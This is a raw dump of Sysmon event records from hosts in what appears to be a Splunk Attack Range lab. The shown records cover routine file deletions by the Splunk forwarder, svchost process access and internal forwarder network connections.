Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90F9D73263308AA6059A5A168002261F,SHA256=70CC5C45683522E20DDBC129C638D1CBA5FE3A786781EA0C2DE027C34CBD853F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638830Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:31.928{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=675BEA6ABBDABD74E30B8E12E69F6165,SHA256=F69C70F304B6C2C36E46542B0F71D6AAF7DC649222A1D5E074D8BDAFEB3A54BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918629Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:31.760{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918628Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:31.760{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918627Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:31.599{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D13932AFC04BFC181A66106888507F7,SHA256=4A9115D8C3BD2B06BC4C1686A205E6FFE8D829B50D8E87BF5FF79F28B5F6B22C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918626Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:31.385{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91F422D7A1E6050A71D30691DD68BC98,SHA256=67FF3FB2E776B0E7B2C57B569606B5DF709F561339AD471EFCFFE9B1613540F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638829Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:26.519{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57274-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638831Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:32.943{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE543F6105F450B531C4F3F9B6021D57,SHA256=09ECCC1CEAD7C3C8B7AC05C965D63E6DA3B1D5B0E01AE52137C46392DF7C037E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918633Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:32.760{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918632Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:32.760{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918631Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:29.254{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1058-false10.0.1.12-8089- 23542300x80000000000000005918630Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:32.393{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40ED141E2143C20862A96627A074F712,SHA256=B95392EA8ECA344AD9FA9337570BF37F0D2CBB27490BC3C079EA9F9C0A0ADE83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638832Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:33.959{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46AC3D8C09927BB9DED7EFDBFC3F32D7,SHA256=EB83E3298282254605F69317E4103B333D1B60ACF9096ECBAE067F523019978B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918636Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:33.760{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918635Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:33.760{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918634Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:33.495{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AD0342044E0A56C524D0CC9D293D3F8,SHA256=AC0C4BCA74388614360D584E235944A1839BDD253A6070F108FB71CE1D285B5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638833Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:34.975{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0A0851217952C59F4C0E9DE11597698,SHA256=1C800D52FA21F819E46929A3BE1B2E7B08F12CEB4F6C6F4E042FAED4A3F0E28B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918641Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:34.760{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918640Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:34.760{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918639Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:31.918{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1059-false10.0.1.12-8000- 23542300x80000000000000005918638Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:34.561{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C46B228A0BB1EC0FF69DD1C8EC1B8814,SHA256=E8F3DE3F7A67342A9CA1DABD05AC22069B8D6C54B757E84DF8E2BFDD9EAD5ED2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918637Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:34.238{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E23E68B0632D49F241DFA84A9BA3C9D,SHA256=1112FD1DADF30EFD3EFF529BF91396D90DBF33FC2D6BC7C8C6C73B344A4618FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638834Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:35.990{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB49B69525AF2D8106046D9CBE0BA1CF,SHA256=9DEFBFEC6A511586478EA6C527BEA9D13E45E6906CFAA10ECB574E1F21FACE96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918644Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:35.761{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918643Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:35.761{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918642Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:35.566{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37DC1EA122E77E3CDF691CA918617F56,SHA256=9E4F8E832A805FD567137BA186417DB1FBFCAED7966F2373E41CB835AA11788E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918647Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:36.761{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918646Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:36.761{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918645Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:36.663{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB6DAA7CD13DE4A54ECE9B883B36D37C,SHA256=8886C2481E24F413D4A28A6E3724D85512E052C3A38827B13B97237F25F3B3B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638836Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:36.068{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8A3CAB9AC304FE5CE6EB6F81EE2B0F0,SHA256=52517FDCCC64C49694F93F3A94A865DA9BDBC64B5440518FA5733A3BCD8480E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638835Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:36.068{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=178199F75F3B7924680E662680996C5A,SHA256=F737669BDA091A634074EF0C350DB8C86B8269FC09E35FC35E0DA35CD5BC4714,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918650Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:37.761{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918649Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:37.761{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918648Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:37.684{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB0DA47D8035D12A1CAA4DB775EC5DE5,SHA256=12444E70786D55486CC917E7ECFB10F98EAA958B653808425C59082445479A4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638838Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:32.332{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57275-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638837Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:37.006{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F51588F5BF102105A485D858EE4AB7C,SHA256=37B1F05B2DF48850929DB2D7A6766AB7D5BD8F65571B9369A0234A16EB37A299,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918653Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:38.761{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918652Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:38.761{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918651Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:38.694{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B86480C810676BC482152960D5479A5,SHA256=208242E3253E37D88F8F5FA0FB34AAC5007ACB9D5392CD3B2964086DDBDE8A3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638839Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:38.006{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD798D5D5CFC8555213382F4DE55600,SHA256=B09B53752A9CD60E59FBCB2226F999A65C7D37EB84DF353EEE8B038A4EB656D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918656Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:39.762{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918655Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:39.762{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918654Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:39.713{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6727DA95A273A24339360C74C9DF3748,SHA256=F960D8A778CFF0ECF7A15BD5A0DE0291D33882BD261927A0B7ED3B7919BE1227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638841Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:39.490{BFB545BB-B866-6058-1200-00000000AF01}1068NT 